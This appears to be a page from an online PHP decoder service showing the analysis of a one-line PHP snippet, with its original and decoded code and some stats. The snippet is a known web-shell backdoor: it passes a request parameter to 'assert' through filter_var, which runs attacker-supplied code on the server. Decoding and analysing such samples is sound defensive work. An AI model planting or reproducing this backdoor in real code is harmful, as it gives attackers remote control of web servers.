Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php filter_var($_REQUEST['op'], FILTER_CALLBACK, array('options' => 'assert')); ?>..
Decoded Output download
<?php
filter_var($_REQUEST['op'], FILTER_CALLBACK, array('options' => 'assert'));
?>
Did this file decode correctly?
Original Code
<?php
filter_var($_REQUEST['op'], FILTER_CALLBACK, array('options' => 'assert'));
?>
Function Calls
None |
Stats
MD5 | 1ba238d3116ceec9fd85a1b78853aeb8 |
Eval Count | 0 |
Decode Time | 112 ms |